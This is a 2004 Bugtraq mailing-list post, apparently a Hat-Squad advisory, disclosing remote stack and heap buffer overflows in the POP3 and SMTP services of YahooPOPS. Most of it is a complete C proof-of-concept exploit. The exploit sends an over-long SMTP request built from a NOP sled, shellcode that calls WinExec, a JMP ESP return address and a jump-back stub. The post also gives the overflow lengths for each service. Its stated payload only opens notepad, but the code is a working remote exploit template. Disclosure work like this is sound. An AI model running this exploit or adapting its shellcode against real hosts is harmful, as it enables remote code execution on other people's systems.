[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: [Hat-Squad] Remote Buffer overflow Vulnerability in YahooPOPS
From: Hat-Squad Security Team <bugtraq () hat-squad ! com>
Date: 2004-09-27 8:36:46
Message-ID: 20040927083646.11788.qmail () www ! securityfocus ! com
[Download RAW message or body]
Hat-Squad Advisory: Remote Buffer overflow Vulnerability in YahooPOPS
September 22, 2004
Product: YahooPOPS!
Vendor URL: http://yahoopops.sourceforge.net
Version: YahooPOPS v0.4 up to v0.6
Vulnerability: Remote Buffer overflows
Release Date: 27 September 2004
Vendor Status:
Informed on 24 September 2004
Response: no response
Description:
YahooPOPs! Is an application that provides POP3 access to Yahoo! Mail. It is \
available on the Windows, Linux, Solaris and Mac platforms. This application emulates \
a POP3 & SMTP server. It also enables popular email clients like Outlook, Netscape, \
Eudora, Mozilla, etc., to download email from Yahoo! accounts. The Latest version of \
this Program is 0.6 and released in 23 May 2004 until now over 120000 users download \
this program.
Both POP3 and SMTP services have buffer overflow vulnerabilities. The Remote Attacker \
can send specific Request to these services to cause a Stack based buffer overflow \
which could allow a remote attacker to execute arbitrary code or just simply crash \
the service on a vulnerable system.
Details:
A YahooPOPS 0.x has the Local SMTP and POP3 engines to send and receive emails. SMTP \
service Dose not Enable By default. Users can enable SMTP by Software Options.
A POP3 USER request with more than 180 bytes will start to corrupt the heap.
POP3 request (Dos Attack):
Telnet localhost 110
+OK POP3 YahooPOPs! Proxy ready
[USER][180xA][BBBB]
As a result EAX and ECX will be overwritten.
SMTP request:
Sending a request with more than 504 bytes will overwrite ESP and cause a stack based \
overflow.
Telnet localhost 25
220 YahooPOPs! Simple Mail Transfer Service Ready
[504xA] [BBBB]
As a result The EIP registers will be overwritten.
Proof of concept demo exploit for YPOP! SMTP listener:
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>
#pragma comment(lib,"wsock32.lib")
int main(int argc, char *argv[])
{
static char overflow[1024];
char ret_code[]="\x23\x9b\x02\x10"; //JMP ESP - libcurl.dll
char jump_back[]="\x89\xe3\x66\x81\xeb\xfb\x01\xff\xe3";
/*- harmless code (tnx to snooq) , will open notepad on the remote machine */
char code[]= "\x33\xc0" // xor eax, eax slight modification to move esp up
"\xb0\xf0" // mov al, 0f0h
"\x2b\xe0" // sub esp,eax
"\x83\xE4\xF0" // and esp, 0FFFFFFF0h
"\x55" // push ebp
"\x8b\xec" // mov ebp, esp
"\x33\xf6" // xor esi, esi
"\x56" // push esi
"\x68\x2e\x65\x78\x65" // push 'exe.'
"\x68\x65\x70\x61\x64" // push 'dape'
"\x68\x90\x6e\x6f\x74" // push 'ton'
"\x46" // inc esi
"\x56" // push esi
"\x8d\x7d\xf1" // lea edi, [ebp-0xf]
"\x57" // push edi
"\xb8\x35\xfd\xe6\x77" // mov eax,XXXX -> WinExec()win2k(SP4)=0x7c4e9c1d
"\xff\xd0" // call eax
"\x4e" // dec esi
"\x56" // push esi
"\xb8\xfd\x98\xe7\x77" // mov eax,YYYY ->ExitProcess()win2k(SP4)0x7c4ee01a
"\xff\xd0"; // call eax
WSADATA wsaData;
struct hostent *hp;
struct sockaddr_in sockin;
char buf[300], *check;
int sockfd, bytes;
int plen,i;
char *hostname;
unsigned short port;
if (argc <= 1)
{
printf("YPOPs! SMTP Overflow\n");
printf("By: Behrang Fouladi(behrang@hat-squad.com)\n\n");
printf("Usage: %s [hostname] [port]\n", argv[0]);
printf("default port is 25 \n");
exit(0);
}
printf("YPOPs! SMTP Overflow\n");
printf("By: Behrang Fouladi(behrang@hat-squad.com)\n\n");
hostname = argv[1];
if (argv[2]) port = atoi(argv[2]);
else port = atoi("25");
if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
{
fprintf(stderr, "Error setting up with WinSock v1.1\n");
exit(-1);
}
hp = gethostbyname(hostname);
if (hp == NULL)
{
printf("ERROR: Uknown host %s\n", hostname);
printf("%s",hostname);
exit(-1);
}
sockin.sin_family = hp->h_addrtype;
sockin.sin_port = htons(port);
sockin.sin_addr = *((struct in_addr *)hp->h_addr);
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
{
printf("ERROR: Socket Error\n");
exit(-1);
}
if ((connect(sockfd, (struct sockaddr *) &sockin,
sizeof(sockin))) == SOCKET_ERROR)
{
printf("ERROR: Connect Error\n");
closesocket(sockfd);
WSACleanup();
exit(-1);
}
printf("Connected to [%s] on port [%d], sending overflow....\n",
hostname, port);
if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
{
printf("ERROR: Recv Error\n");
closesocket(sockfd);
WSACleanup();
exit(1);
}
/* wait for SMTP service welcome*/
buf[bytes] = '\0';
check = strstr(buf, "220");
if (check == NULL)
{
printf("ERROR: NO response from SMTP service\n");
closesocket(sockfd);
WSACleanup();
exit(-1);
}
plen=504-sizeof(code);
memset(overflow,0,sizeof(overflow));
for (i=0; i<plen;i++){strcat(overflow,"\x90");}
strcat(overflow,code);
strcat(overflow,ret_code);
strcat(overflow,jump_back);
strcat(overflow,"\n");
if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)
{
printf("ERROR: Send Error\n");
closesocket(sockfd);
WSACleanup();
exit(-1);
}
printf("Exploit Sent.\n");
closesocket(sockfd);
WSACleanup();
return 0;
}
--------------------------------------------------------------------------
Vendor response: no response
Credits:
This vulnerability has been discovered by Nima Majidi (nima_majidi@hat-squad.com)
The Original advisory could be found at:
http://www.hat-squad.com/en/000075.html
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic